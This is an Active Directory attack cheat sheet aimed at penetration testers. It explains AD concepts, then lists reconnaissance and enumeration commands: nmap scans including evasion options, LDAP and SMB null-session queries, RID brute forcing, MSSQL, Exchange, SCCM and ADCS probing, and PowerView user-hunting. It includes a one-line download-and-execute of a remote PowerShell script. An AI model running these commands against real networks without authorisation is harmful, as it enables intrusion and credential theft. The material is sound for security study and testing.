The Ultimate Active Directory CheatSheet
The Ultimate Active Directory Attack Cheat Sheet:
Mission: This guide is designed to be your comprehensive tactical field manual for dissecting Active Directory environments. It meticulously integrates common techniques, tools, and commands in a phased approach, drawing from expert sources and aiming for exhaustive detail for penetration testers and security professionals.
"First Of All There Is No Writeup Or Cheat Sheet Can Contains Every Thing Our This Cheat Sheet Is The Notes And The Details So Far Till Now in My Journey In AD Wish You Like It"
A Note on Tooling: This guide has been updated to reflect the transition from CrackMapExec (CME) to its successor, NetExec (nxc). Commands previously using cme will now use nxc. NetExec is actively maintained and offers the same powerful capabilities.
Getting to Know Active Directory: The Lay of the Land 🌍
Before we jump into the attacks, let's ensure we're all on the same page with some foundational AD concepts. Understanding these is key to knowing why certain attacks work.
The Crown Jewels (ntds.dit): Think of this as the main AD treasure chest. It's a database file, usually hiding at
C:\Windows\NTDS\ntds.dit(though this path can be changed by an administrator). It holds everything about the domain: users, groups, computers, Group Policy information, and most importantly, those precious password hashes (NTLM hashes and Kerberos keys) for all domain accounts. Access to this file is paramount for an attacker aiming for full domain compromise.The Keepers of the Kingdom (Domain Controllers - DCs): These are the workhorse servers that host and replicate the AD database (ntds.dit). They handle who gets in (authentication via Kerberos Key Distribution Center - KDC, LDAP) and what they can do (authorization). Usually, multiple DCs exist for redundancy and load balancing. Since Windows 2000, AD uses a multi-master replication model, meaning (with some exceptions for specific operations/FSMO roles) changes can be made on any writable DC and will replicate to others.
The Kingdom Itself (Domain): This is your main boundary for administration, security, and policies in AD. It's a collection of all the users, computers, groups, and other objects that share the same directory database, security policies (like password policy), and trust relationships.
Domains, Trees, and Forests - The Bigger Picture:
Tree: Imagine a family tree of domains. They're hierarchically linked (parent-child relationships) and share a contiguous DNS namespace (like
corp.example.comwith its childeurope.corp.example.com). DNS is a critical component and absolutely essential for AD functionality. Trusts between domains in a tree are typically two-way and transitive by default.Forest: Now picture a collection of these "family trees" (one or more domain trees). They all agree on the basic rules (Schema - defines object classes and attributes), share some common info (Configuration partition, Global Catalog), and have trust connections (typically two-way, transitive) between the roots of each tree. The first domain created in a forest is the forest root domain.
Organizational Units (OUs): These are like folders within your domain, used to organize users, computers, other OUs, or other objects. They often mirror a company's departmental or geographical structure. OUs are crucial for delegating administrative control over specific sets of objects and for applying specific Group Policies. This is not a security boundary in itself, but a management one.
Mapping the Network (Sites): Sites in AD usually reflect your physical network layout (e.g., different office locations connected by WAN links, defined by IP subnets). This helps ensure client computers and member servers authenticate to and locate services (like DCs or DFS shares) on the closest (in terms of network topology and cost) servers, which speeds things up and optimizes WAN bandwidth usage by controlling replication traffic.
The Rulebooks (Group Policy Objects - GPOs): GPOs are sets of rules and configuration settings that dictate how systems look and behave for users and computers. They're the command center for security settings (password policies, account lockout, audit policies, AppLocker), software rollouts, login scripts, desktop configurations, and tons more. Most GPO settings translate to registry key changes on target machines. GPOs are linked to Sites, Domains, or OUs. The "Group Policy Client" service on Windows machines applies these settings.
SYSVOL: This is a special shared folder replicated across all DCs in a domain (you can typically get to it via
\\<DOMAIN_NAME>\SYSVOL\<DOMAIN_NAME>\Policiesor\\<DC_IP>\SYSVOL\<DOMAIN_NAME>\Policies). It holds all the GPO template data (settings files like .ini, .pol, .xml, .inf) and scripts (logon, logoff, startup, shutdown). Authenticated domain users can read most of its contents, making it a potential source for finding sensitive information (like passwords in old GPP XML files) or misconfigurations.The Directory's Language (LDAP - Lightweight Directory Access Protocol): This is the primary protocol applications and tools use to query and modify information in Active Directory. It usually runs on TCP port 389 (unencrypted LDAP) or TCP port 636 (LDAP over SSL/TLS, known as LDAPS). LDAP queries can be very specific, making it efficient for enumeration. LDAP logs can be voluminous, sometimes making malicious enumeration harder to spot for defenders.
The Gatekeeper (Kerberos): This is AD's primary network authentication protocol. It's a ticket-based system (Ticket Granting Tickets - TGTs, and Ticket Granting Service tickets - TGSs/service tickets) designed to provide strong authentication for client/server applications by using secret-key cryptography.
NTLM (New Technology LAN Manager): An older challenge-response authentication protocol.
NTLM as a protocol (MS-NLMP): Used for network authentication. It has versions: LM (Lan Manager - very weak, DES-based), NTLMv1 (weak, MD4-based), and NTLMv2 (stronger, HMAC-MD5 based, but still weaker than Kerberos).
NTLM as a hash: The NTLM hash (MD4 of UTF-16LE password) is used to store passwords on disk (in SAM for local accounts, ntds.dit for domain accounts).
While less preferred than Kerberos, NTLM is often still enabled for compatibility. Its presence opens up attack vectors like Pass-the-Hash and NTLM relay.
Local Password Stash (SAM - Security Accounts Manager): On individual Windows machines (workstations, member servers, and DCs for their DSRM accounts), the SAM file (
C:\Windows\System32\config\SAM) stores NTLM hashes for local user accounts. It's protected by the SYSTEM account.The Security Enforcer (LSASS - Local Security Authority Subsystem Service): The
lsass.exeprocess is critical. It handles user logins (interactive, network, service), security policy enforcement, password changes, and creates access tokens that define a user's privileges. Because of this role, LSASS memory often contains credentials (plaintext passwords, NTLM hashes, Kerberos tickets/keys) for recently logged-on users and active service accounts, making it a prime target for credential dumping. LSA Protection (PPL) and Credential Guard can make this harder.SAMR (Security Account Manager Remote Protocol): A legacy, SMB-based protocol that can be used for enumerating users, groups, and other domain information. It's slower and provides less information than LDAP but might be useful if LDAP is restricted.
PKI (Public Key Infrastructure) & ADCS (Active Directory Certificate Services): ADCS allows organizations to manage their own PKI, issuing digital certificates for authentication, encryption, and signing. Components include Certificate Authority (CA), Certificate Templates, Enrollment Services, Certificate Revocation Lists (CRLs), Online Certificate Status Protocol (OCSP). Misconfigurations can lead to severe vulnerabilities. ADCS integrates tightly with AD DS.
Certificate Templates: Predefined configurations for certificates (purpose, key size, validity, issuance policies). Stored as AD objects (pKICertificateTemplate).
Enrollment Services: Enterprise CAs publish themselves here. Clients find CAs based on objects in this container.
NTAuthCertificates Object: Defines CA certificates trusted for AD authentication. Client certs used for AD auth must be signed by a CA in this store.
AIA (Authority Information Access) Container: Hosts intermediate and cross-CA certificates for chain validation.
Trusts: Relationships between domains/forests allowing users from one to access resources in another.
Types: Parent-Child, Tree-Root (intra-forest, transitive by default); External (inter-forest, non-transitive by default, SID filtering usually enabled); Forest (inter-forest, transitive, SID filtering can be complex). Shortcut/Cross-Link (intra-forest, optimize auth paths). Realm (Windows to non-Windows Kerberos).
Direction: Direction of trust is opposite to direction of access (e.g., Domain A trusts Domain B means users in B can access resources in A).
Authentication Levels (Cross-Forest): Forest-wide (intra-forest default), Domain-wide, Selective Authentication (most secure, requires "Allowed-To-Authenticate" right on resource's DACL for trusted principal).
SID Filtering: Security mechanism on trusts (especially external/forest) to prevent SIDs from a trusted domain/forest from granting unintended privileges in the trusting domain/forest (e.g., filtering well-known SIDs or SIDs not belonging to the trusted domain).
SCCM (System Center Configuration Manager / MECM / ConfigMgr): System management software for managing large groups of Windows-based computers. Used for patch management, software distribution, OS deployment. Components: Primary Server, Site Database (MSSQL), SMS Provider, Distribution Point (DP), Management Point (MP).
MSSQL Server: Relational database management system. Often integrated with AD. Uses Transact-SQL (T-SQL).
Microsoft Exchange Server: Email, calendaring, contacts, tasks. Components: Autodiscover, Outlook Web App (OWA), Exchange Web Services (EWS), MAPI/HTTP, ActiveSync.
Phase 1: Reconnaissance & Enumeration - Knowing Your Target 🗺️
Your Goal Here: To suck up every piece of information you can about the target's Active Directory setup. You're looking for chinks in the armor, high-value targets (Domain Admins, other privileged users like server admins/helpdesk/developers, executives), soft targets (weak/old passwords, never-logged-in accounts), network topology (based on AD sites, IP ranges), Group Policy weaknesses and protections, software deployments (e.g., SCCM), Exchange configurations, MSSQL instances, ADCS setup, trust relationships, services and service accounts, delegation rights, and pathways for your attack. Think of this as drawing a detailed map of the battlefield.
1.1 Network & Host Discovery: Who's Home and What Doors Are Open? 🚪
Your Goal Here: Find out which machines are alive on the network, what ports they have open, and what services are listening on those ports.
Pro Tip: Start wide, then zoom in. External scanning (if applicable) uses different assumptions than internal scanning. Consider the assessment type (black-box, grey-box, white-box) and client-imposed restrictions (e.g., testing from a managed VDI with limited tools).
Your Toolkit & Commands:
Nmap (The Network Mapper's Best Friend)
Finding Live Hosts (Ping Sweeps):
Command:
nmap -sn <IP_Range/CIDR>Purpose: No port scan (ping sweep only). Discovers live hosts using ICMP, ARP, and TCP ACK/SYN on common ports.
<IP_Range/CIDR>: Target network (e.g.,192.168.1.0/24).
Command:
nmap -PE -PS445 -PA80 -PP -sn <IP_Range/CIDR>Purpose: More thorough host discovery using ICMP echo (
-PE), TCP SYN to port 445 (-PS445), TCP ACK to port 80 (-PA80), and IP Protocol Ping (-PP). No port scan (-sn).
Command:
nmap -sP <IP_Range/CIDR> -oN live_hosts.txt(Older syntax for
-sn)Purpose: Ping sweep, saves live hosts to
live_hosts.txt.
Host Discovery Types:
-PE(ICMP Echo),-PP(ICMP Timestamp),-PM(ICMP Address Mask),-PS<portlist>,-PA<portlist>,-PU<portlist>,-PY<portlist>,-PR(ARP Ping - local, fast, reliable),-Pnor-P0(Skip host discovery).
Basic Port Scanning (TCP):
Command:
nmap -sT <Target_IP>Purpose: TCP Connect Scan (completes full handshake). Reliable but noisy.
Command:
nmap -sS <Target_IP>Purpose: TCP SYN Scan ("half-open" scan). Stealthier, often needs root/admin. Default if privileges allow.
Command:
nmap -F <Target_IP>Purpose: Fast scan of the most common 100 ports from
nmap-services.
Command:
nmap -p <Port_List> <Target_IP>(e.g.,
-p 80,443,3389or-p T:22,U:53,161)Purpose: Scan specific ports.
Command:
nmap -p- <Target_IP>Purpose: Scan all TCP ports (1-65535). Can be very slow.
Command:
nmap --top-ports <Number> <Target_IP>Purpose: Scan the
<Number>most common TCP ports.
Command:
nmap -r <Target_IP>Purpose: Scan ports sequentially, not randomized.
UDP Scanning:
Command:
nmap -sU <Target_IP>Purpose: Scans common UDP ports. Can be slow and less reliable.
Command:
nmap -sU --top-ports 20 <Target_IP>Purpose: Scans the top 20 most common UDP ports.
Command:
nmap -sU --top-ports 100 -oN nmap-udp-initial.txt <Target_IP>
Service Version & OS Detection:
Command:
nmap -sV <Target_IP>Purpose: Attempts to determine service versions on open ports.
Command:
nmap -sV --version-intensity <0-9>(Default 7; higher is more thorough)
Command:
nmap -sV --version-trace <Target_IP>(Debug version scan)
Command:
nmap -O <Target_IP>Purpose: Attempts to determine the operating system. Usually needs root/admin and an open & closed TCP port.
Command:
nmap -O --osscan-limit(Limit OS detection to promising targets)
Command:
nmap -O --osscan-guess <Target_IP>(More aggressive OS guessing)
Command:
nmap -A <Target_IP>Purpose: Aggressive scan. Enables OS detection (
-O), version detection (-sV), default script scanning (-sC), and traceroute (--traceroute). Noisy.
Comprehensive Initial Scan Example:
nmap -sS -sV -O -sC -T4 -p- -oA nmap_tcp_initial_$(date +%Y%m%d)_<TargetName> <Target_IP_or_Range>(Save all formats)
Nmap Scripting Engine (NSE):
Command:
nmap -sC <Target_IP>or
nmap --script default <Target_IP>Purpose: Runs the default set of "safe" NSE scripts.
Command:
nmap --script discovery <Target_IP>Purpose: Runs scripts categorized for host/service discovery.
Command:
nmap --script vuln <Target_IP>Purpose: Runs scripts that check for known vulnerabilities. Use with caution and proper authorization.
Command:
nmap --script <ScriptName1>,<ScriptName2> <Target_IP>Purpose: Runs specific, comma-separated NSE scripts.
Command:
nmap --script "smb-*" <Target_IP>(e.g.,
smb-os-discovery,smb-enum-shares,smb-vuln-*)Command:
nmap --script "ldap-*" <Target_IP>(e.g.,
ldap-search -b "dc=example,dc=com" "(objectClass=*)")Command:
nmap --script "rpc-*" <Target_IP>Command:
nmap --script "dns-*" <Target_IP>Command:
nmap --script "http-*" <Target_IP>Command:
nmap <ip> -p 80,443 --script=http-shellshock --script-args uri=/cgi-bin/xx.cgiPurpose: Example of running a specific script (
http-shellshock) against ports 80 and 443, with script-specific arguments (uri).
Command:
nmap --script-help <ScriptName>(Help for a script)
Timing & Performance:
Commands:
nmap -T<0-5> <Target_IP>or
nmap -T<paranoid|sneaky|polite|normal|aggressive|insane> <Target_IP>Purpose: Control scan speed and stealth. T0 is slowest/stealthiest, T5 is fastest/noisiest. T3/T4 are common.
Command:
nmap --min-rate <PacketsPerSec> <Target_IP> nmap --max-rate <PacketsPerSec> <Target_IP>Purpose: Ensures Nmap sends at least/at most
<PacketsPerSecond>.
Command:
nmap --max-retries <Number> <Target_IP>(Default 10)
Purpose: Specifies the maximum number of port scan probe retransmissions.
Other timing options:
nmap --ttl <time_value> <Target_IP> nmap --min-parallelism <num> --max-parallelism <num> <Target_IP> nmap --min-hostgroup <num> --max-hostgroup <num> <Target_Range> nmap --initial-rtt-timeout <time> --max-rtt-timeout <time> --min-rtt-timeout <time> <Target_IP> nmap --scan-delay <time> --max-scan-delay <time> <Target_IP> nmap --defeat-rst-ratelimit <Target_IP> nmap --host-timeout <time> <Target_IP>(e.g.,
10m)
Firewall/IDS Evasion & Spoofing (Use ethically and with authorization):
nmap -f <Target_IP>(Fragment packets - 8-byte frags),
nmap --mtu <MTU> <Target_IP>nmap -D RND:<number_of_decoys> <Target>or
nmap -D <decoy1,decoy2,ME,...> <Target>nmap -sI <zombie_host>:<probe_port> <Target>(Idle Zombie Scan)
nmap --source-port <portnumber> <Target_IP>or
nmap -g <portnumber> <Target_IP>nmap --data <hex_string> <Target_IP>or
nmap --data-string <string> <Target_IP>or
nmap --data-length <size> <Target_IP>nmap --randomize-hosts <Target_Range>nmap --spoof-mac <MAC_address|0|vendor_name> <Target_IP>(Local Ethernet segment only)
nmap --badsum <Target_IP>(Send bad checksums)
Advanced Scan Types:
nmap -sN <Target_IP>(TCP NULL),
nmap -sF <Target_IP>(TCP FIN),
nmap -sX <Target_IP>(Xmas Scan) (Stealthy, RFC 793 based, not for Windows)
nmap -sA <Target_IP>(TCP ACK Scan - map firewall rules, filtered/unfiltered)
nmap --scanflags <flags> <Target_IP>(Custom TCP flags: URG, ACK, PSH, RST, SYN, FIN)
nmap -sO <Target_IP>(IP Protocol Scan - TCP, UDP, ICMP, IGMP etc.)
Output Formats:
Command:
nmap -oN normal_output.txt <Target_IP>Command:
nmap -oG grepable_output.gnmap <Target_IP>Command:
nmap -oX xml_output.xml <Target_IP>Command:
nmap -oA <Basename> <Target_IP>(Saves in All major formats: .nmap, .xml, .gnmap)
DNS Resolution:
-R(Force reverse DNS),-n(Disable reverse DNS - faster),--system-dns,--dns-servers <servers>Scanning for AD-Specific Ports:
Command:
nmap -p 53,88,135,137,139,389,445,464,593,636,1433,3268,3269,5985,5986,9389,49152-65535 <Target_DC_or_Range>Purpose: Scans a comprehensive list of common AD-related ports, including RPC dynamic range.
Key AD Ports to Know:
DNS (53/tcp/udp)
Kerberos (88/tcp/udp)
RPC EPMAP (135/tcp/udp)
NetBIOS Name Service (137/udp)
NetBIOS Datagram Service (138/udp)
NetBIOS Session Service (139/tcp)
LDAP (389/tcp/udp)
SMB (445/tcp)
Kerberos Pwd Change (464/tcp/udp)
RPC over HTTP (593/tcp)
LDAPS (636/tcp)
MSSQL (1433/tcp)
Global Catalog LDAP (3268/tcp)
Global Catalog LDAPS (3269/tcp)
WinRM HTTP (5985/tcp)
WinRM HTTPS (5986/tcp)
AD Web Services (ADWS) (9389/tcp)
RPC Dynamic Ports (Default: 49152-65535/tcp for Win2008+; Older: 1025
Masscan (For very large networks - extremely fast asynchronous port scanner)
Command:
masscan <IP_Range/CIDR> -p<Port(s)> --rate <Rate>(TCP)
Purpose: Extremely fast TCP port scanner.
<Port(s)>: Ports to scan (e.g.,80,0-65535).<Rate>: Packets per second (e.g.,100000). Use high rates with caution.
Command:
masscan <IP_Range/CIDR> -pU:<Port(s)> --rate <Rate>(UDP)
Purpose: Extremely fast UDP port scanner.
Tool Link:
robertdavidgraham/masscan(GitHub)
Ping / fping:
Command:
ping <IP_Address>Purpose: Sends ICMP echo requests to check host liveness.
Command:
fping -a -g <IP_Range/CIDR> 2>/dev/nullPurpose: Pings a range and shows only live (
-a) hosts.-ggenerates the range. Errors suppressed.
Netdiscover:
Command:
sudo netdiscover -r <IP_Range/CIDR> -i <interface>Purpose: Discovers hosts on the local network using ARP requests.
-rspecifies the range,-ithe interface.
Metasploit Scanning Modules:
auxiliary/scanner/portscan/tcp,auxiliary/scanner/discovery/arp_sweepSearchsploit:
searchsploit <keyword_e.g_apache_2.4.51> searchsploit <EDB-ID> -m <Output_Location>Passive Network Sniffing (Wireshark, tcpdump):
On attack host:
sudo tcpdump -i <interface> -w capture.pcapLook for ARP, MDNS, NBT-NS, DHCP, DNS traffic to identify active hosts and potential services.
Wireshark filter examples:
arp,mdns,nbns,bootp,dns.
1.2 Mapping the AD Structure & Finding Services (DNS, SMB, LDAP, RPC, MSSQL, Exchange, SCCM, ADCS) 🗺️
Your Goal Here: Figure out where the Domain Controllers are, understand the domain and forest layout, identify trust relationships, and pinpoint AD-specific services.
Pro Tip: LDAP is excellent for structured queries. SAMR is a legacy alternative. DNS (SRV records), SMB, and RPC are key.
Your Toolkit & Commands:
DNS Digging:
Dnsrecon:
Command:
dnsrecon -d <Domain_Name> -t srvPurpose: Enumerates DNS SRV records (often point to AD services).
Command:
dnsrecon -d <Domain_Name> -a(Attempts AXFR zone transfer)
Command:
dnsrecon -d <Domain_Name> -t std(Standard record enumeration)
Nslookup:
Command:
nslookup -type=SRV _ldap._tcp.dc._msdcs.<Domain_Name> [<DNS_Server_IP>]Purpose: Queries DNS for SRV records for LDAP services (finds DCs).
Command:
nslookup -type=SRV _kerberos._tcp.dc._msdcs.<Domain_Name> [<DNS_Server_IP>]Purpose: Finds Kerberos KDCs (usually DCs).
Command:
nslookup -type=SRV _gc._tcp.dc._msdcs.<Domain_Name> [<DNS_Server_IP>]Purpose: Finds Global Catalog servers.
Also useful:
_ldap._tcp.pdc._msdcs.<Domain_Name>(PDC Emulator)
Nltest (Windows built-in):
Command:
nltest /dclist:<Domain_Name>Purpose: Lists all Domain Controllers for the specified domain.
Command:
nltest /dnsgetdc:<Domain_Name>Purpose: Queries DNS for a DC and displays its capabilities.
Command:
nltest /domain_trustsPurpose: Shows domain trust relationships for the current domain.
Command:
nltest /server:<ServerName> /sc_query:<DomainName>(Secure channel status)
Dig (Linux DNS tool):
Command:
dig @<DNS_Server_IP> <Domain_Name> AXFR +nocookiePurpose: Attempts a DNS zone transfer. Highly valuable if successful, often blocked.
Command:
dig srv _ldap._tcp.dc._msdcs.<Domain_Name> @<DNS_Server_IP>Purpose: Similar to nslookup for finding LDAP SRV records.
PowerShell (ADModule or built-in):
Command:
Resolve-DnsName -Name _ldap._tcp.dc._msdcs.<Domain_Name> -Type SRV -Server <DNS_Server_IP>Purpose: PowerShell equivalent for querying SRV records.
adidnsdump:
adidnsdump -u <domain\user> -p <password> ldap://<DC_IP> -r(Resolve unknown records)
SMB/NetBIOS Snooping:
enum4linux-ng:
Command:
enum4linux-ng -A <Target_IP_or_DC>(Comprehensive "do everything")
Command:
enum4linux-ng -U <Target_IP_or_DC>(Enumerates users)
Command:
enum4linux-ng -S <Target_IP_or_DC>(Enumerates shares)
Also:
-P(password policy),-G(groups),-o(OS info).
nbtscan:
Command:
nbtscan -r <IP_Range/CIDR>(Scans range for NetBIOS info)
Command:
nbtscan <Target_IP>(Scans single host)
NetExec (nxc, formerly CrackMapExec):
Command:
nxc smb <IP_Range/CIDR>(Basic SMB enum: OS, null sessions, SMB signing)
Command:
nxc smb <IP_Range/CIDR> --sharesCommand:
nxc smb <Target_IP> -u '' -p '' --users(Null session user enum)
Command:
nxc smb <Target_IP> -u <user> -p <pass> --rid-brute [MAX_RID]
smbmap:
Command:
smbmap -H <Target_IP>(List shares anonymously)
Command:
smbmap -u <user> -p <pass> -d <domain> -H <Target_IP> -R <ShareName> --dir-only(Recursive dir listing)
LDAP Interrogation (The core of AD enumeration):
ldapsearch (Linux OpenLDAP tool):
Anonymous RootDSE:
ldapsearch -x -H ldap://<DC_IP> -s base -b "" "(objectClass=*)" namingContexts defaultNamingContext supportedLDAPVersion supportedSASLMechanisms domainFunctionality forestFunctionality +Purpose: Critical first step. Gets naming contexts (base DNs for further queries) and server capabilities.
-xfor simple auth,-Hfor LDAP URI,-s basefor base search,-b ""for empty base (rootDSE),+for operational attributes.
Anonymous Users:
ldapsearch -x -H ldap://<DC_IP> -b "<defaultNamingContext>" "(&(objectClass=user)(objectCategory=person))" sAMAccountName cn description pwdLastSet lastLogon userAccountControl whenCreated whenChanged distinguishedName memberOfAnonymous Groups:
ldapsearch -x -H ldap://<DC_IP> -b "<defaultNamingContext>" "(objectClass=group)" sAMAccountName description member adminCountAnonymous Computers:
ldapsearch -x -H ldap://<DC_IP> -b "<defaultNamingContext>" "(objectClass=computer)" dNSHostName operatingSystem operatingSystemServicePack servicePrincipalName msDS-AllowedToDelegateTo userAccountControlAuthenticated:
ldapsearch -x -H ldap://<DC_IP> -D "<UserDN_or_UPN>" -w "<Password>" -b "<BaseDN>" "<LDAP_Filter>" <Attributes_to_return>-D: Bind DN (e.g.,cn=user,dc=corp,dc=localoruser@corp.local).-w: Password.
ADExplorer (Sysinternals): Visual AD browsing, snapshots for offline analysis.
JXplorer / LDAPAdmin: Cross-platform GUI LDAP browsers.
PowerView (PowerSploit PowerShell module):
Get-NetDomainor
Get-DomainGet-NetDomainControlleror
Get-DomainControllerGet-NetForestor
Get-ForestGet-NetForestDomainor
Get-ForestDomainGet-NetDomainTrustor
Get-DomainTrustGet-NetForestTrustor
Get-ForestTrustGet-DomainPolicy(Shows password policy, Kerberos, lockout)
(Get-DomainPolicy)."systemaccess"(Password & lockout policies)
(Get-DomainPolicy)."kerberospolicy"(Kerberos ticket lifetimes)
ADModule (Built-in PowerShell module):
Get-ADDomainGet-ADDomainController -Discover -Service PrimaryDC(Finds PDC Emulator)
Get-ADForestGet-ADTrust -Filter *
windapsearch.py:
windapsearch.py --dc-ip <DC_IP> -U windapsearch.py --dc-ip <DC_IP> -u <user> -p <pass> --daAlso
--all-attributes,--custom <filter>.ldapdomaindump (Python tool):
Command:
ldapdomaindump ldap://<DC_IP> -u <DOMAIN\USER> -p <PASSWORD> -o <Output_Dir>Purpose: Dumps domain info (users, groups, computers, policies) into HTML/JSON for offline review.
RPC Probing:
rpcclient (Linux Samba tool):
Command:
rpcclient -U "" -N <Target_IP>(Attempts null session connection)
If successful, sub-commands:
srvinfo,enumdomusers,enumdomgroups,queryuser <RID>,lookupnames <Name>,lookupsids <SID>,lsaquery.Authenticated:
rpcclient -U "<DOMAIN\USER>%<PASSWORD>" <Target_IP> -c "<command>"
rpcdump.py (Impacket Python script):
Command:
rpcdump.py <Target_IP>(Lists available RPC endpoints)
Command:
rpcdump.py @<Target_IP>(Queries RPC endpoint mapper directly)
Nmap NSE for RPC:
nmap --script rpcap-brute,rpcinfo <Target_IP>
MSSQL Enumeration:
Nmap:
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-dac,ms-sql-dump-hashes <Target_IP>PowerUpSQL:
Import-Module PowerUpSQL.ps1 Get-SQLInstanceDomain -Verbose Get-SQLServerInfo -Instance <SQL_Instance> -Verbose Get-SQLServerLink -Instance <SQL_Instance> -VerboseNetExec (nxc):
nxc mssql <Target_IP> -u <user> -p <pass> --links, --databases, --impersonate-users
Exchange Enumeration:
Nmap NSE:
sudo nmap -sCV --script http-ntlm-info,http-vuln-cve2017-11774,exchange-enum-users --script-args http-ntlm-info.root=/ews/,exchange-enum-users.fingerprintfile=/usr/share/nmap/nselib/data/exchange-fingerprints.txt -p80,443 <Exchange_IP>ntlmscan (Python):
python3 ntlmscan.py --host https://<Exchange_IP>/ews/exchange.asmxRuler, MailSniper for deeper interaction (e.g.,
Invoke-PasswordSprayOWA,Get-GlobalAddressList).Version enum:
curl https://<Exchange_IP>/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application -k | xmllint --format | grep version
SCCM (Microsoft Endpoint Configuration Manager) Enumeration:
sccmhunter:
python3 sccmhunter.py find -u <User> -p <Pass> -d <Domain> -dc-ip <DC_IP> python3 sccmhunter.py smb ... -save(profile, list shares, PXEBoot vars).
SharpSCCM: .NET tool for SCCM enumeration and abuse.
LDAP: Look for
CN=System Management,CN=Systemcontainer. Object classesmssmsmanagementpoint,mssmssite.
ADCS (Active Directory Certificate Services) Enumeration:
Certify.exe (Windows):
Certify.exe find /vulnerable,Certify.exe cas(list CAs).Certipy (Linux/Python):
certipy find -u '<user>@<domain>' -p '<pass>' -dc-ip <DC_IP> -vulnerable -stdout certipy find ... -bloodhoundPSPKI (PowerShell):
Get-CertificationAuthority,Get-CertificationAuthorityAcl.Check Cert Publishers group membership:
net localgroup "Cert Publishers"(on DC).
LDAP:
CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>. Containers: Certification Authorities, Enrollment Services, Certificate Templates, NTAuthCertificates.
1.3 Domain Object Enumeration (Users, Groups, Computers, GPOs, OUs, ACLs, Trusts) 📂
Your Goal Here:
Pinpoint specific users (privileged, service accounts, stale accounts).
Identify groups (membership, admin groups, groups with modifiable ACLs).
Enumerate computers (OS, roles, delegation settings).
Analyze GPOs (settings, linked OUs, vulnerable GPPs).
Understand OU structure (GPO linkage, delegation of control).
Examine ACLs (permissions on objects, looking for misconfigurations like GenericAll, WriteDACL, WriteOwner).
Map trust relationships.
Pro Tip:
Look for descriptions (e.g.,
password in description).Check
pwdLastSet(old passwords) andlastLogonTimestamp(inactive accounts).Identify
SPNs(Kerberoasting targets).Analyze
userAccountControlflags (delegation settings,DONT_REQ_PREAUTH).Examine
msDS-AllowedToDelegateTo(constrained delegation).Note
adminCount=1(AdminSDHolder protection).PowerView&ADModuleare excellent for this.BloodHoundvisualizes attack paths.NetExec (nxc)scales enumeration, especially with credentials.
Working with PowerShell Modules:
Import-Module ActiveDirectory(RSAT needed or on DC/member)
Import-Module .\PowerView.ps1(or
IEX (New-Object Net.WebClient).DownloadString('http://host/PowerView.ps1'))
Your Toolkit & Commands:
PowerView (PowerSploit PowerShell module):
Domain/Forest Info:
Get-NetDomain Get-DomainSID (Get-DomainPolicy)."systemaccess" (Get-DomainPolicy)."kerberospolicy"(Or
Get-Domain)Users:
Get-NetUser Get-DomainUser Get-NetUser -UserName <User> Get-DomainUser -Identity <User> Get-NetUser -Properties samaccountname,description,pwdlastset,lastlogontimestamp,badpwdcount,memberof,serviceprincipalname,useraccountcontrol,admincount,comment,mail Find-UserField -SearchField Description -SearchTerm "admin*" Get-UserProperty -Properties pwdlastset,lastlogon | Sort-Object pwdlastset Get-NetUser -PreauthNotRequired Get-DomainUser -PreauthNotRequired Get-NetUser -SPN Get-DomainUser -SPN Get-NetUser -TrustedToAuth Get-DomainUser -TrustedToAuth Get-NetUser -Unconstrained Get-DomainUser -AllowDelegation Get-NetUser -PasswordNotRequired Get-NetUser -PasswordNeverExpires Get-NetUser -AdminCountGroups:
Get-NetGroup Get-DomainGroup Get-NetGroup -GroupName "Domain Admins" Get-DomainGroup -Identity "Domain Admins" Get-NetGroupMember -GroupName "Domain Admins" -Recurse Get-DomainGroupMember -Identity "Domain Admins" -Recursive Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty Member Get-NetLocalGroup -ComputerName <Target> -Recurse Get-NetGroup -AdminCount Find-ForeignUser Find-ForeignGroupComputers:
Get-NetComputer Get-DomainComputer Get-NetComputer -FullData Get-NetComputer -OperatingSystem "*Server*" Get-NetComputer -Unconstrained Get-NetComputer -TrustedToAuth Get-NetComputer -PingGPOs:
Get-NetGPO Get-NetGPO -ComputerName <ComputerName> Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName Find-GPOLocation -UserName <UserName> Get-NetGPOGroup Get-NetGPO -GPOname <GUID_of_GPO>OUs:
Get-NetOU -FullData Get-NetOU -OUName "Servers"ACLs:
Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose Find-InterestingDomainAcl -ResolveGUIDs Invoke-ACLScanner -ResolveGUIDs Get-PathAcl -Path "\\<Server>\<Share>"Trusts:
Get-NetDomainTrust Get-NetForestDomain Get-NetForestTrust Get-DomainTrustMappingUser Hunting / Session Snooping (Often needs local admin on targets):
Find-DomainUserLocation -ShowAll Invoke-UserHunter Invoke-UserHunter -CheckAccess Invoke-UserHunter -Stealth Find-LocalAdminAccess -Verbose Invoke-EnumerateLocalAdmin -Verbose Get-NetSession -ComputerName <Target> Get-NetLoggedon -ComputerName <Target> Invoke-UserHunter -GroupName "Domain Admins" -Verbose
ADModule (PowerShell's Official AD Cmdlets):
Users:
Get-ADUser -Filter * -Properties * Get-ADUser -Identity <User> -Properties * Get-ADUser -Filter 'Description -like "*admin*"' -Properties Description,MemberOf Get-ADUser -Filter {Enabled -eq $true -and PasswordNeverExpires -eq $true} -Properties PasswordNeverExpires, SamAccountName Get-ADUser -Filter {(userAccountControl -band 4194304) -and (Enabled -eq $true)} -Properties userAccountControl, SamAccountName Get-ADUser -Filter {(servicePrincipalName -ne "$null") -and (Enabled -eq $true)} -Properties servicePrincipalName, SamAccountName Get-ADUser -Filter {(msDS-AllowedToDelegateTo -ne "$null") -or (userAccountControl -band 524288) -or (userAccountControl -band 16777216)} -Properties SamAccountName, msDS-AllowedToDelegateTo, userAccountControlGroups:
Get-ADGroup -Filter * Get-ADGroupMember -Identity "Domain Admins" -RecursiveComputers:
Get-ADComputer -Filter * -Properties * Get-ADComputer -Filter {OperatingSystem -like "*Server*"} -Properties OperatingSystem,DNSHostName Get-ADComputer -Filter {userAccountControl -band 524288} -Properties SamAccountNameGPOs:
Get-GPO -All Get-GPOReport -Name "<GPOName>" -ReportType Html -Path C:\temp\gpo_report.htmlOUs:
Get-ADOrganizationalUnit -Filter *Trusts:
Get-ADTrust -Filter * Get-ADTrust -Identity <DomainName>Forest:
